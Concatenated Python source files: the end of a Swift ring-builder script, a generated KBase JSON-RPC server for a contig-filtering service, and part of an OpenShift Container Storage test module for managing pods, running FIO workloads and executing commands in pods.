kargs.pop('validate')
build_ring(*ring_call, **kargs)
if __name__ == "__main__":
parser = OptionParser(USAGE)
parser.add_option("-f", "--file", dest="setup",
help="Specify the swift ring contents file.", metavar="FILE")
options, args = parser.parse_args(sys.argv[1:])
if options.setup and not exists(options.setup):
print("Swift ring contents file not found or doesn't exist")
parser.print_help()
sys.exit(1)
sys.exit(main(options.setup))
|
ContigFilteringPSDServer.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'ContigFilteringPSD'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from ContigFilteringPSD.ContigFilteringPSDImpl import ContigFilteringPSD
impl_ContigFilteringPSD = ContigFilteringPSD(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['ContigFilteringPSD.filter_contigs_async'] = ['ContigFilteringPSD', 'filter_contigs']
async_check_methods['ContigFilteringPSD.filter_contigs_check'] = ['ContigFilteringPSD', 'filter_contigs']
sync_methods['ContigFilteringPSD.filter_contigs'] = True
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
raise ValueError('Neither \'job-service-url\' parameter is defined in '+
'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'ContigFilteringPSD'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_ContigFilteringPSD.filter_contigs,
name='ContigFilteringPSD.filter_contigs',
types=[dict])
self.method_authentication['ContigFilteringPSD.filter_contigs'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"ContigFilteringPSD but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user, _, _ = \
self.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
pod.py
|
"""
Pod related functionalities and context info
Each pod in the openshift cluster will have a corresponding pod object
"""
import logging
import os
import re
import yaml
import tempfile
import time
import calendar
from threading import Thread
import base64
from semantic_version import Version
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.ocp import OCP, verify_images_upgraded
from ocs_ci.helpers import helpers
from ocs_ci.helpers.proxy import update_container_with_proxy_env
from ocs_ci.ocs import constants, defaults, node, workload, ocp
from ocs_ci.framework import config
from ocs_ci.ocs.exceptions import (
CommandFailed,
NonUpgradedImagesFoundError,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableResourceException,
ResourceNotFoundError,
)
from ocs_ci.ocs.utils import setup_ceph_toolbox, get_pod_name_by_pattern
from ocs_ci.ocs.resources.ocs import OCS, get_job_obj
from ocs_ci.utility import templating
from ocs_ci.utility.utils import (
run_cmd,
check_timeout_reached,
TimeoutSampler,
get_ocp_version,
)
from ocs_ci.utility.utils import check_if_executable_in_path
from ocs_ci.utility.retry import retry
logger = logging.getLogger(__name__)
FIO_TIMEOUT = 600
TEXT_CONTENT = (
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, "
"sed do eiusmod tempor incididunt ut labore et dolore magna "
"aliqua. Ut enim ad minim veniam, quis nostrud exercitation "
"ullamco laboris nisi ut aliquip ex ea commodo consequat. "
"Duis aute irure dolor in reprehenderit in voluptate velit "
"esse cillum dolore eu fugiat nulla pariatur. Excepteur sint "
"occaecat cupidatat non proident, sunt in culpa qui officia "
"deserunt mollit anim id est laborum."
)
TEST_FILE = "/var/lib/www/html/test"
FEDORA_TEST_FILE = "/mnt/test"
class Pod(OCS):
"""
Handles per pod related context
"""
def __init__(self, **kwargs):
"""
Initializer function
kwargs:
Copy of ocs/defaults.py::<some pod> dictionary
"""
self.pod_data = kwargs
# configure http[s]_proxy env variable, if applicable
update_container_with_proxy_env(self.pod_data)
super(Pod, self).__init__(**kwargs)
with tempfile.NamedTemporaryFile(
mode="w+", prefix="POD_", delete=False
) as temp_info:
self.temp_yaml = temp_info.name
self._name = self.pod_data.get("metadata").get("name")
self._labels = self.get_labels()
self._roles = []
self.ocp = OCP(
api_version=defaults.API_VERSION,
kind=constants.POD,
namespace=self.namespace,
)
self.fio_thread = None
# TODO: get backend config !!
self.wl_obj = None
self.wl_setup_done = False
@property
def name(self):
return self._name
@property
def namespace(self):
return self._namespace
@property
def roles(self):
return self._roles
@property
def labels(self):
return self._labels
@property
def restart_count(self):
return self.get().get("status").get("containerStatuses")[0].get("restartCount")
def __setattr__(self, key, val):
self.__dict__[key] = val
def add_role(self, role):
"""
Adds a new role for this pod
Args:
role (str): New role to be assigned for this pod
"""
self._roles.append(role)
def get_fio_results(self, timeout=FIO_TIMEOUT):
"""
Get FIO execution results
Returns:
dict: Dictionary represents the FIO execution results
Raises:
Exception: In case of exception from FIO
"""
logger.info(f"Waiting for FIO results from pod {self.name}")
try:
result = self.fio_thread.result(timeout)
if result:
return yaml.safe_load(result)
raise CommandFailed(f"FIO execution results: {result}.")
except CommandFailed as ex:
logger.exception(f"FIO failed: {ex}")
raise
except Exception as ex:
logger.exception(f"Found Exception: {ex}")
raise
def exec_cmd_on_pod(
self, command, out_yaml_format=True, secrets=None, timeout=600, **kwargs
):
"""
Execute a command on a pod (e.g. oc rsh)
Args:
command (str): The command to execute on the given pod
out_yaml_format (bool): whether to return yaml loaded python
object OR to return raw output
secrets (list): A list of secrets to be masked with asterisks
This kwarg is popped in order to not interfere with
subprocess.run(``**kwargs``)
timeout (int): timeout for the exec_oc_cmd, defaults to 600 seconds
Returns:
Munch Obj: This object represents a returned yaml file
"""
rsh_cmd = f"rsh {self.name} "
rsh_cmd += command
return self.ocp.exec_oc_cmd(
rsh_cmd, out_yaml_format, secrets=secrets, timeout=timeout, **kwargs
)
def exec_s3_cmd_on_pod(self, command, mcg_obj=None):
"""
Execute an S3 command on a pod
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials
command (str): The command to execute on the given pod
Returns:
Munch Obj: This object represents a returned yaml file
"""
return self.exec_cmd_on_pod(
craft_s3_command(command, mcg_obj),
out_yaml_format=False,
secrets=[mcg_obj.access_key_id, mcg_obj.access_key, mcg_obj.s3_endpoint]
if mcg_obj
else None,
)
def exec_sh_cmd_on_pod(self, command, sh="bash"):
"""
Execute a pure bash command on a pod via oc exec where you can use
bash syntaxt like &&, ||, ;, for loop and so on.
Args:
command (str): The command to execute on the given pod
Returns:
str: stdout of the command
"""
cmd = f'exec {self.name} -- {sh} -c "{command}"'
return self.ocp.exec_oc_cmd(cmd, out_yaml_format=False)
def get_labels(self):
"""
Get labels from pod
Raises:
NotFoundError: If resource not found
Returns:
dict: All the openshift labels on a given pod
"""
return self.pod_data.get("metadata").get("labels")
def exec_ceph_cmd(self, ceph_cmd, format="json-pretty"):
"""
Execute a Ceph command on the Ceph tools pod
Args:
ceph_cmd (str): The Ceph command to execute on the Ceph tools pod
format (str): The returning output format of the Ceph command
Returns:
dict: Ceph command output
Raises:
CommandFailed: In case the pod is not a toolbox pod
"""
if "rook-ceph-tools" not in self.labels.values():
raise CommandFailed("Ceph commands can be executed only on toolbox pod")
ceph_cmd = ceph_cmd
if format:
ceph_cmd += f" --format {format}"
out = self.exec_cmd_on_pod(ceph_cmd)
# For some commands, like "ceph fs ls", the returned output is a list
if isinstance(out, list):
return [item for item in out if item]
return out
def get_storage_path(self, storage_type="fs"):
"""
Get the pod volume mount path or device path
Returns:
str: The mount path of the volume on the pod (e.g. /var/lib/www/html/) if storage_type is fs
else device path of raw block pv
"""
# TODO: Allow returning a path of a specified volume of a specified
# container
if storage_type == "block":
return (
self.pod_data.get("spec")
.get("containers")[0]
.get("volumeDevices")[0]
.get("devicePath")
)
return (
self.pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("mountPath")
)
def workload_setup(self, storage_type, jobs=1):
"""
Do setup on pod for running FIO
Args:
storage_type (str): 'fs' or 'block'
jobs (int): Number of jobs to execute FIO
"""
work_load = "fio"
name = f"test_workload_{work_load}"
path = self.get_storage_path(storage_type)
# few io parameters for Fio
self.wl_obj = workload.WorkLoad(name, path, work_load, storage_type, self, jobs)
assert self.wl_obj.setup(), f"Setup for FIO failed on pod {self.name}"
self.wl_setup_done = True
def run_io(
self,
storage_type,
size,
io_direction="rw",
rw_ratio=75,
jobs=1,
runtime=60,
depth=4,
rate="1m",
rate_process="poisson",
fio_filename=None,
bs="4K",
end_fsync=0,
):
"""
Execute FIO on a pod
This operation will run in background and will store the results in
'self.thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
storage_type (str): 'fs' or 'block'
size (str): Size in MB, e.g. '200M'
io_direction (str): Determines the operation:
'ro', 'wo', 'rw' (default: 'rw')
rw_ratio (int): Determines the reads and writes using a
<rw_ratio>%/100-<rw_ratio>%
(e.g. the default is 75 which means it is 75%/25% which
equivalent to 3 reads are performed for every 1 write)
jobs (int): Number of jobs to execute FIO
runtime (int): Number of seconds IO should run for
depth (int): IO depth
rate (str): rate of IO default 1m, e.g. 16k
rate_process (str): kind of rate process default poisson, e.g. poisson
fio_filename(str): Name of fio file created on app pod's mount point
bs (str): Block size, e.g. 4K
end_fsync (int): If 1, fio will sync file contents when a write
stage has completed. Fio default is 0
"""
if not self.wl_setup_done:
self.workload_setup(storage_type=storage_type, jobs=jobs)
if io_direction == "rw":
self.io_params = templating.load_yaml(constants.FIO_IO_RW_PARAMS_YAML)
self.io_params["rwmixread"] = rw_ratio
else:
self.io_params = templating.load_yaml(constants.FIO_IO_PARAMS_YAML)
self.io_params["runtime"] = runtime
size = size if isinstance(size, str) else f"{size}G"
self.io_params["size"] = size
if fio_filename:
self.io_params["filename"] = fio_filename
self.io_params["iodepth"] = depth
self.io_params["rate"] = rate
self.io_params["rate_process"] = rate_process
self.io_params["bs"] = bs
if end_fsync:
self.io_params["end_fsync"] = end_fsync
self.fio_thread = self.wl_obj.run(**self.io_params)
def fillup_fs(self, size, fio_filename=None):
"""
Execute FIO on a pod to fillup a file
This will run sequantial IO of 1MB block size to fill up the fill with data
This operation will run in background and will store the results in
'self.thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
size (str): Size in MB, e.g. '200M'
fio_filename(str): Name of fio file created on app pod's mount point
"""
if not self.wl_setup_done:
self.workload_setup(storage_type="fs", jobs=1)
self.io_params = templating.load_yaml(constants.FIO_IO_FILLUP_PARAMS_YAML)
size = size if isinstance(size, str) else f"{size}M"
self.io_params["size"] = size
if fio_filename:
self.io_params["filename"] = fio_filename
self.fio_thread = self.wl_obj.run(**self.io_params)
def run_git_clone(self, skip_install=True):
"""
Execute git clone on a pod to simulate a Jenkins user
Args:
skip_install (bool): By default True, skips git package
installation in pod
"""
name = "test_workload"
work_load = "jenkins"
wl = workload.WorkLoad(
name=name, work_load=work_load, pod=self, path=self.get_storage_path()
)
if not skip_install:
assert wl.setup(), "Setup for git failed"
wl.run()
def install_packages(self, packages):
"""
Install packages in a Pod
Args:
packages (list): List of packages to install
"""
if isinstance(packages, list):
packages = " ".join(packages)
cmd = f"yum install {packages} -y"
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def copy_to_server(self, server, authkey, localpath, remotepath, user=None):
"""
Upload a file from pod to server
Args:
server (str): Name of the server to upload
authkey (str): Authentication file (.pem file)
localpath (str): Local file/dir in pod to upload
remotepath (str): Target path on the remote server
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = (
f'scp -i {authkey} -o "StrictHostKeyChecking no"'
f" -r {localpath} {user}@{server}:{remotepath}"
)
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def exec_cmd_on_node(self, server, authkey, cmd, user=None):
"""
Run command on a remote server from pod
Args:
server (str): Name of the server to run the command
authkey (str): Authentication file (.pem file)
cmd (str): command to run on server from pod
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = f'ssh -i {authkey} -o "StrictHostKeyChecking no" {user}@{server} {cmd}'
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def get_memory(self, container_name):
"""
Get the pod memory size
Args:
container_name (str): The name of the container to look for
Returns:
str: The container memory size (e.g. '5Gi')
"""
pod_containers = self.pod_data.get("spec").get("containers")
matched_containers = [
c for c in pod_containers if c.get("name") == container_name
]
if len(matched_containers) > 1:
logger.error(
f"Multiple containers, of the same name, were found: {[c.get('name') for c in matched_containers]}"
)
container = matched_containers[0]
return container.get("resources").get("limits").get("memory")
def get_node(self):
"""
Gets the node name
Returns:
str: Node name
"""
if config.ENV_DATA.get(
"platform", ""
).lower() == "aws" and config.DEPLOYMENT.get("local_storage"):
return self.pod_data["spec"]["nodeSelector"]["kubernetes.io/hostname"]
else:
return self.pod_data["spec"]["nodeName"]
# Helper functions for Pods
def get_all_pods(
namespace=None,
selector=None,
selector_label="app",
exclude_selector=False,
wait=False,
):
"""
Get all pods in a namespace.
Args:
namespace (str): Name of the namespace
If namespace is None - get all pods
selector (list) : List of the resource selector to search with.
Example: ['alertmanager','prometheus']
selector_label (str): Label of selector (default: app).
exclude_selector (bool): If list of the resource selector not to search with
Returns:
list: List of Pod objects
"""
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
# In case of >4 worker nodes node failures automatic failover of pods to
# other nodes will happen.
# So, we are waiting for the pods to come up on new node
if wait:
wait_time = 180
logger.info(f"Waiting for {wait_time}s for the pods to stabilize")
time.sleep(wait_time)
pods = ocp_pod_obj.get()["items"]
if selector:
if exclude_selector:
pods_new = [
pod
for pod in pods
if pod["metadata"].get("labels", {}).get(selector_label) not in selector
]
else:
pods_new = [
pod
for pod in pods
if pod["metadata"].get("labels", {}).get(selector_label) in selector
]
pods = pods_new
pod_objs = [Pod(**pod) for pod in pods]
return pod_objs
def get_ceph_tools_pod():
"""
Get the Ceph tools pod
Returns:
Pod object: The Ceph tools pod object
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
)
ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
if not ct_pod_items:
# setup ceph_toolbox pod if the cluster has been setup by some other CI
setup_ceph_toolbox()
ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
assert ct_pod_items, "No Ceph tools pod found"
# In the case of node failure, the CT pod will be recreated with the old
# one in status Terminated. Therefore, need to filter out the Terminated pod
running_ct_pods = list()
for pod in ct_pod_items:
if (
ocp_pod_obj.get_resource_status(pod.get("metadata").get("name"))
== constants.STATUS_RUNNING
):
running_ct_pods.append(pod)
assert running_ct_pods, "No running Ceph tools pod found"
ceph_pod = Pod(**running_ct_pods[0])
return ceph_pod
